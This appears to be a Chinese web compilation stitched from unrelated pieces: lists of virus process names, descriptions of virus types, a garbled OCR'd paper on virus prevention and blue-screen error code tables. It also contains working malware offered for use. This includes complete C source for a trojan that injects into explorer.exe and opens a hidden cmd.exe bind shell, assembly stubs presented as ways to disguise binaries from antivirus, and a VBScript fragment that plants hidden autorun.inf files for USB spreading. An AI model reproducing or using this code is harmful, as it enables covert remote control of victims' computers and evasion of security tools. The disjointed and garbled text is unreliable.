病毒代码大全
病毒进程大全

Aplica32.exe → 将死者病毒 Mprdll.exe → Bla
Avconsol.exe → 将死者病毒 Msabel32.exe → Cain and Abel
Internet.exe → 网络神偷 Sysrunt.exe → Ripper
Kernel16.exe → Transmission Scount System.exe → s**tHeap
Kernel32.exe → 坏透了或冰河 System32.exe → DeepThroat 1.0
Bbeagle.exe → 恶鹰蠕虫病毒 Msie5.exe → Canasson
Brainspy.exe → BrainSpy vBeta Msstart.exe → Backdoor.livup
Cfiadmin.exe → 将死者病毒 Mstesk.exe → Doly 1.1-1.5
Winzip.exe → ShadowPhyre Wqk.exe → 求职信病毒 常见病毒、木马进程速查表
exe → BF Evolution Mbbmanager.exe → 聪明基因
_.exe → Tryit Mdm.exe → Doly 1.6-1.7
Diagcfg.exe → 广外女生 Pcx.exe → Xplorer
Dkbdll.exe → Der Spaeher Pw32.exe → 将死者病毒
Dllclient.exe → Bobo Recycle - Bin.exe → s**tHeap
Vw32.exe → 将死者病毒 Windown.exe → Spirit 2000 1.2
电脑病毒危害大全有哪些

电脑病毒危害大全有哪些电脑病毒危害一:电脑病毒(1)源码型病毒这类病毒在高级语言(如fortan、c、pascal等语言)编写的程序被编译之前,插人列源程序之中,经编译成为合法程序的一部分。
这类病毒程序一般寄生在编译处理程序或链接程序中。
目前,这种病毒并不多见。
电脑病毒(2)可执行文件感染病毒这类病毒感染可执行程序,将病毒代码和可执行程序联系起来,当可执行程序被执行的时候,病毒随之启动。
感染可执行文件的病毒从技术上也可分为嵌人型和外壳型两种。
嵌人型病毒在感染时往往对宿主程序进行一定的修改,通常是寻找宿主程序的空隙将自己嵌人进去,并变为合法程序的一部分,使病毒程序与目标程序成为一体,这类病毒编写起来很难要求病毒能自动在感染目标程序中寻找恰当的位置,把自身插人,同时还要保证病毒能正常实施攻击,且感染的目标程序能正常运行。
一旦病毒侵人宿主程序,对其杀毒是十分困难的清除这类病毒时往往会破坏合法程序。
这类病毒的数量不多,但破坏力极大,而且很难检测,有时即使査出病毒并将其清除,但被感染的程序也被破坏,无法使用了。
外壳型病毒一般链接在宿主程序的首尾,对原来的主程序不作修改或仅作简单修改。
当宿主程序执行时首先执行并激活病毒程序,使病毒得以感染、繁衍和发作。
这类病毒易于编写,数量也最多。
(3)操作系统型病毒这类病毒程序用自己的逻辑部分取代一部分操作系统中的合法程序模块,从而寄生在计算机磁盘的操作系统区,在启动计算机时,能够先运行病毒程序,然后再运行启动程序,这类病毒可表现出很强的破坏力,可以使系统瘫痪,无法启动。
电脑病毒危害二:电脑病毒从本质上讲,它是一段电脑程序,,电脑病毒可分为以下几种,文件型病毒、系统型病毒和宏病毒。
1,文件型病毒:是一种驻留内存的病毒。
,主要感染可执行文件,在运行染有此类病毒的可执行文件时,驻留内存,并伺机传染或进行破坏。
2,系统型病毒:是一个破坏性极强的病毒,它是通过篡改磁盘上的系统区的内容来进行传染和破坏的。
病毒代码大全

制造木马病毒代码大全2008-06-08 19:46 制造木马病毒代码大全一个简单的木马原型基础代码添加上自己的XXX,加上变态的壳,做点小修改,就可以.....#include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构; typedef struct_RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体DWORD __stdcall ThreadProc(RemotePara *Para){ WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall*PLoadLibrary)(char*); typedef FARPROC (__stdcall*PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall*PGetModuleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc =(PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket = (FARPROC)Para->dwSocket; Phtons = (FARPROC)Para->dwhtons; Pbind =(FARPROC)Para->dwbind; Plisten =(FARPROC)Para->dwlisten; Paccept = (FARPROC)Para->dwaccept; Psend =(FARPROC)Para->dwsend; Precv =(FARPROC)Para->dwrecv; Pclosesocket = (FARPROC)Para->dwclosesocket; PCreateProcessA = (FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile = (FARPROC)Para->dwReadFile; PCloseHandle = (FARPROC)Para->dwCloseHandle; PCreatePipe = (FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion =MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA)&WSAData); listenSocket =PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family =AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr =INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr,&iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0);if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用si.dwFlags =STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1;if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NUL L,NULL,&si,&ProcessInformatio n))return 0; while(1){ memset(Para->Buff,0,4096);PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRe ad,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1,Para->Buff, lBytesRead, &lBytesRead, 0))break;if(!Psend(clientSocket, Para->Buff, lBytesRead,0))break; }else { lBytesRead=Precv(clientSocket,Para->Buff, 4096, 0); if(lBytesRead <=0 ) break;if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead,&lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_ PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE); // 获得指定进程句柄,并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName("EXPLORER.EXE"); if(pID == 0)return 0; hRemoteProcess =OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);if(!hRemoteProcess)return 0; // 在远程进程地址空间分配虚拟内存pRemoteThread =VirtualAllocEx(hRemoteProcess, 0, THREADSIZE,MEM_COMMIT |MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return 0; // 将线程执行体ThreadProc 写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel = LoadLibrary( "kernel32.dll"); myRemotePara.dwLoadLibrary =(DWORD)GetProcAddress(hKernel, "LoadLibraryA"); myRemotePara.dwFreeLibrary =(DWORD)GetProcAddress(hKernel, "FreeLibrary"); myRemotePara.dwGetProcAddress =(DWORD)GetProcAddress(hKernel, "GetProcAddress"); myRemotePara.dwGetModuleHandle =(DWORD)GetProcAddress(hKernel, "GetModuleHandleA"); myRemotePara.dwCreateProcessA =(DWORD)GetProcAddress(hKernel, "CreateProcessA"); myRemotePara.dwPeekNamedPipe =(DWORD)GetProcAddress(hKernel, "PeekNamedPipe"); myRemotePara.dwWriteFile =(DWORD)GetProcAddress(hKernel, "WriteFile"); myRemotePara.dwReadFile =(DWORD)GetProcAddress(hKernel, "ReadFile"); myRemotePara.dwCloseHandle =(DWORD)GetProcAddress(hKernel, "CloseHandle"); myRemotePara.dwCreatePipe =(DWORD)GetProcAddress(hKernel, "CreatePipe"); myRemotePara.dwTerminateProcess =(DWORD)GetProcAddress(hKernel, "TerminateProcess"); hSock = LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup =(DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket =(DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons =(DWORD)GetProcAddress(hSock,"htons");myRemotePara.dwbind =(DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten =(DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept =(DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv =(DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend =(DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket =(DWORD)GetProcAddress(hSock,"closesocket"); hUser32 = LoadLibrary("user32.dll");myRemotePara.dwMessageBox =(DWORD)GetProcAddress(hUser32, "MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0"); strcat(myRemotePara.winsockDll,"wsock32.dll\\0"); strcat(myRemotePara.cmd,"cmd.exe\\0");strcat(myRemotePara.telnetmsg,"ConnectSucessful!\\n\\0"); //写进目标进程pRemotePara=(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE); if(!pRemotePara)return 0;if(!WriteProcessMemory(hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0; // 启动线程hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD(__stdcall *)(void*))pRemoteThread ,pRemotePara,0,&byte_write); while(1) {} FreeLibrary(hKernel); FreeLibrary(hSock); FreeLibrary(hUser32); CloseHandle(hRemoteProcess); CloseHandle(hToken); return 0; } BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){ TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].L uid); tp.Privileges[0].Attributes = fEnable ?SE_PRIVILEGE_ENABLED:0;AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL, NULL); return((GetLastError() == ERROR_SUCCESS)); } DWORD GetPidByName(char *szName) { HANDLE hProcessSnap = INVALID_HANDLE_VALUE; PROCESSENTRY32 pe32={0}; DWORD dwRet=0; hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE)return 0; pe32.dwSize = sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap, &pe32)) { do{ if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) { dwRet=pe32.th32ProcessID; break; } }while (Process32Next(hProcessSnap,&pe32)); } else return 0;if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle (hProcessSnap); return dwRet; 1.伪装vc++5.0 代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jmp 原入口地址*********************************************** ************************* 2.胡乱跳转代码:nop push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx loop somewhere /跳转到上面那段代码地址去!somewhere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址/在附近随意跳jmp ... /... jmp 原入口地址/跳到原始oep 90 55 8B EC 41 52 90 5A 49 5D 41 转储免杀*********************************************** ************************* 3.伪装c++代码:push ebp mov ebp,esp push -1 push 111111 push 222222 mov eax,fs:[0] push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 4.伪装Microsoft VisualC++ 6.0 代码:PUSH -1 PUSH 0 PUSH 0 MOVEAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP SUB ESP,68 PUSH EBX PUSH ESI PUSH EDI POP EAX POP EAX POP EAX ADD ESP,68 POP EAX MOV DWORD PTR FS:[0],EAX POP EAX POP EAX POP EAX POP EAX MOV EBP,EAX JMP 原入口地址push ebp mov ebp,esp jmp*********************************************** ************************* 5.伪装防杀精灵一号防杀代码:push ebp mov ebp,esp push -1 push 666666 push 888888 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 6.伪装防杀精灵二号防杀代码:push ebp mov ebp,esp push -1 push 0 push 0 mov eax,dword ptr fs:[0] push eax mov dword ptr fs:[0],esp sub esp,68 push ebx push esi push edi pop eax pop eax pop eax add esp,68 pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp 原入口地址*********************************************** ************************* 7.伪装木马彩衣(无限复活袍)代码:PUSH EBP MOV EBP,ESP PUSH -1 push 415448 -\___ PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0] PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL /这条指令可以不要! jo 原入口地址jno 原入口地址call 下一地址*********************************************** ************************* 8.伪装木马彩衣(虾米披风)代码:push ebp nop nop mov ebp,esp inc ecx nop push edx nop nop pop edx nop pop ebp inc ecx loop somewhere /跳转到下面那段代码地址去!someshere: nop /"胡乱"跳转的开始... jmp 下一个jmp 的地址/在附近随意跳jmp ... /... jmp 原入口的地址/跳到原始oep 9.伪装花花添加器(神话)代码:-----------根据C++改nop nop nop mov ebp,esp push -1 push 111111 push 222222 mov eax,dword ptr fs:[0]push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax mov eax,原入口地址push eax retn*********************************************** ************************* 10.伪装花花添加器(无极)代码:nop mov ebp, esp push -1 push 0A2C2A push0D9038 mov eax, fs:[0] push eax mov fs:[0], esp pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址jmp eax*********************************************** ************************* 11.伪装花花添加器(金刚)代码:--------根据VC++5.0 改nop nop mov ebp, esp push -1 push 415448 push 4021A8 mov eax, fs:[0] push eax mov fs:[0], esp add esp, -6C push ebx push esi push edi add [eax], al mov eax,原入口地址jmp eax*********************************************** ************************* 12.伪装花花添加器(杀破浪)代码:nop mov ebp, esp push -1 push 0 push 0 mov eax, fs:[0] push eax mov fs:[0], esp sub esp, 68 push ebx push esi push edi pop eax pop eax pop eax add esp, 68 pop eax mov fs:[0], eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax, 原入口地址jmp eax*********************************************** ************************* 12.伪装花花添加器(痴情大圣)代码:nop ..........省略N 行nop nop push ebp mov ebp, esp add esp, -0C add esp, 0C mov eax, 原入口地址push eax retn*********************************************** ************************* 13.伪装花花添加器(如果*爱)代码:nop ........省略N 行nop nop push ebp mov ebp, esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx mov eax, 原入口地址jmp eax*********************************************** ************************* 14.伪装PEtite 2.2 -> Ian Luck 代码:mov eax,0040E000 push 004153F3 push dword ptr fs:[0] mov dword ptr fs:[0],esp pushfw pushad push eax xor ebx,ebx pop eax popad popfw pop dword ptr fs:[0] pop eax jmp 原入口地址'执行到程序的原有OEP*********************************************** ************************* 15.无效PE 文件代码:push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx MOV DWORD PTR FS:[0],EAX \ POP EAX | POP EAX \ MOV DWORD PTR FS:[0],EAX |(注意了。
电脑病毒种类大全有哪些

电脑病毒种类大全有哪些导读:我根据大家的需要整理了一份关于《电脑病毒种类大全有哪些》的内容,具体内容:电脑病毒种类有很多很多,你知道多少种呢?跟着我去看看!下面由我给你做出详细的介绍!希望对你有帮助!电脑病毒种类介绍一:电脑病毒种类1、系统病毒系统病毒的前缀为...电脑病毒种类有很多很多,你知道多少种呢?跟着我去看看!下面由我给你做出详细的介绍!希望对你有帮助!电脑病毒种类介绍一:电脑病毒种类1、系统病毒系统病毒的前缀为:Win32、PE、Win95、W32、W95等。
这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。
如CIH病毒。
电脑病毒种类2、蠕虫病毒蠕虫病毒的前缀是:Worm。
这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。
比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
电脑病毒种类3、木马病毒、黑客病毒木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack 。
木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。
木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。
现在这两种类型都越来越趋向于整合了。
一般的木马如QQ消息尾巴木马 Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60 。
这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为"密码"的英文"password"的缩写)一些黑客程序如:网络枭雄(her.Client)等。
电脑病毒种类4、脚本病毒脚本病毒的前缀是:Script。
电脑蓝屏代码

电脑蓝屏代码以下内容为百度知道Ctangel个人总结,并非网络复制,全是个人日常工作中遇到并且明确确定原因的。
如需复制请注明出处。
这里列举几个典型的蓝屏故障的原因和解决办法。
一、0X0000000A这个蓝屏代码和硬件无关,是驱动和软件有冲突造成的,最早发现这个代码是因为公司的DELL机器的USB键盘和QQ2007的键盘加密程序有冲突发现的这个问题。
也在IBM T 系列笔记本上装驱动失误产生过。
如果您的机器蓝屏了,而且每次都是这个代码请想一想最近是不是更新了什么软件或者什么驱动了,把它卸载再看一下。
一般情况下就能够解决,如果实在想不起来,又非常频繁的话,那么没办法,重新做系统吧。
二、0X0000007B这个代码和硬盘有关系,不过不用害怕,不是有坏道了,是设置问题或者病毒造成的硬盘引导分区错误。
如果您在用原版系统盘安装系统的时候出这个问题,那说明您的机器配置还是比较新的,作为老的系统盘,不认这么新的硬盘接口,所以得进BIOS把硬盘模式改成IDE兼容模式。
当然了,现在人们都用ghost版的操作系统,比较新的ghost盘是不存在这个问题的。
关于人们找不到IDE这项的问题,因为很多主板标明这项的措辞不太一样有些写着AHCI和Compatibility,这个AHCI就等于是SATA模式,Compatibility相当于IDE模式。
如果您的操作系统使用了一段时间了,突然有一天出现这个问题了,那么对不起,病毒造成的,开机按F8,选择最后一次正确的配置,恢复不到正常模式的话那么请重新做系统吧。
三、0X000000ED这个故障和硬盘有关系,系统概率比较大,硬盘真坏的概率比较小。
我弄过不下二十个这个代码的蓝屏机器了,其中只有一个是硬盘真的有坏道了。
剩下的都是卷出了问题,修复即可,这也是为数不多的可以修复的蓝屏代码之一。
修复方法是找原版的系统安装盘(或者金手指V6那个pe启动界面里就带控制台修复)。
这里说用系统盘的方法,把系统盘放入光驱,启动到安装界面,选择按R进入控制台修复,进入控制台后会出现提示符C:\ 大家在这里输入chkdsk -r 然后它就会自动检测并修复问题了,修复完成之后重新启动计算机就可以进入系统了,进入系统之后最好先杀毒,然后再重新启动一下试一下,如果正常了那就没问题了,如果还出这个代码,那就说明硬盘有问题了,需要更换,或者把有问题的地方单独分区,做成隐藏分区,用后面的空间来装系统。
病毒编写指令大全

dirc=chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97))&chr((int)((rnd*22)+97)) '定义一个变量,赋值是随机的
set file=fso.getfile(drivearray(i)&"\hack.txt") '得到hack.txt的句柄
file.writeline "attrib +s +h +r "&drivearray(i)&"\autorun.inf"
file.writeline "attrib +s +h +r "&drivearray(i)&"\"&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\hack.txt")
file.writeline "shell/oth/command="&dirc&".vbs"
file.close
set file=fso.getfile(drivearray(i)+"\autorun.txt") '这里不用说啦吧,获得句柄
file.copy(drivearray(i)+"\autorun.inf") '复制自身为autorun.inf
浅谈防范计算机病毒

科牵5 20襞翥 L 0年 技 1 第期
浅谈 防范计算机病毒
罗建华
( 江县信息 中心 ,黑龙 江齐齐 哈尔 1 10 龙 6 0) 1
摘 要 随着计算 机在社会生活各个领 域的广泛运用 ,以及电脑 的普及 和网络的迅猛发展 ,计算机病毒呈现 愈演愈烈的趋势 ,严 重地 干扰 了正 常的人类 社会生活 ,给计算机系统带来 了巨大的潜在威胁 和破坏。 目前 ,病毒 已成为困扰计算机 系统安全和计算机应 用的重大f题 。 目 为 了确保信 息的安全与畅通 ,从计算机病毒 的概 念人手 ,分析计算 机病毒的 内涵及类 型 ,并对计算机 病毒来源进行分析 ,最后介绍计算机
强 ,破坏性大,产生于内部 , 防不胜防。 4 用于研究 或有益 目的而设计 的程序 , 由于某种原 因失去控制或 ) 产生了意想不到的效果 。
3 计 算机 病毒 防范措 施
1 )应养成及时下 载最新 系统安全漏洞补丁的安全习惯 ,从根源上 杜绝黑客利用系统漏洞攻击用户计算机的病毒。同时 , 升级杀毒软件、 开启病毒实时监控应成为每 日防范病毒 的必修课 。 2 )定期做好重要资料的备份 ,以免造成重大损失。 3 选 择具 备 “ ) 网页 防火墙”功能的杀毒软件,每天升级杀毒软件 病毒J 定时对计算机进行病毒查杀 ,上网时开启杀毒软件全部监控。 车, 4)不要随便打开来源不明的E cl xe或Wod r文档 ,并且要及时升级病 毒库 ,开启实时监控 ,以免受到病毒 的侵害。 5)上 网浏览时一定要开启 杀毒软件的实 时监控功能 ,以免遭到病 毒侵害。 6 网浏览时 ,不要随便 点击不安全 陌生 网站 ,以免遭 到病毒侵 )
f] 2姬志 刚. q 开始认 识网络安全 『 . 从 q J 中国科 教博览,0 4 . 1 2 0 , 9
电脑蓝屏代码大全(完美版)

电脑蓝屏代码大全0X0000000 操作完成0X0000001 不正确的函数0X0000002 系统找不到指定的文件0X0000003 系统找不到指定的路径0X0000004 系统无法打开文件0X0000005 拒绝存取0X0000006 无效的代码0X0000007 内存控制模块已损坏0X0000008 内存空间不足,无法处理这个指令0X0000009 内存控制模块位址无效0X000000A 环境不正确0X000000B 尝试载入一个格式错误的程序0X000000C 存取码错误0X000000D 资料错误0X000000E 内存空间不够,无法完成这项操作0X000000F 系统找不到指定的硬盘0X0000010 无法移除目录0X0000011 系统无法将文件移到其他的硬盘0X0000012 没有任何文件0X0000019 找不到指定扇区或磁道0X000001A 指定的磁盘或磁片无法存取0X000001B 磁盘找不到要求的装置0X000001C 打印机没有纸0X000001D 系统无法将资料写入指定的磁盘0X000001E 系统无法读取指定的装置0X000001F 连接到系统的某个装置没有作用0X0000021文件的一部分被锁定,现在无法存取0X0000024 开启的分享文件数量太多0X0000026 到达文件结尾0X0000027 磁盘已满(可以清理磁盘!一个磁盘尽量不要装太满!!)0X0000036 网络繁忙0X000003B 网络发生意外的错误0X0000043 网络名称找不到0X0000050 文件已经存在0X0000052 无法建立目录或文件0X0000053 INT24失败(什麼意思?还请高手指点站长一二)0X000006B 因为代用的磁盘尚未插入,所以程序已经停止0X000006C 磁盘正在使用中或被锁定0X000006F 文件名太长0X0000070 硬盘空间不足0X000007F 找不到指定的程序0X000045B 系统正在关机0X000045C 无法中止系统关机,因为没有关机的动作在进行中0X000046A 可用服务器储存空间不足0X0000475 系统BIOS无法变更系统电源状态0X000047E 指定的程序需要新的windows版本0X000047F 指定的程序不是windwos或ms-dos程序0X0000480 指定的程序已经启动,无法再启动一次0X0000481 指定的程序是为旧版的 windows所写的0X0000482 执行此应用程序所需的程序库文件之一被损0X0000483 没有应用程序与此项操作的指定文件建立关联0X0000484 传送指令到应用程序无效0X00005A2 指定的装置名称无效0X00005AA 系统资源不足,无法完成所要求的服务0X00005AB系统资源不足,无法完成所要求的服务0X00005AC系统资源不足,无法完成所要求的服务110 0x006E 系统无法开启指定的装置或档案。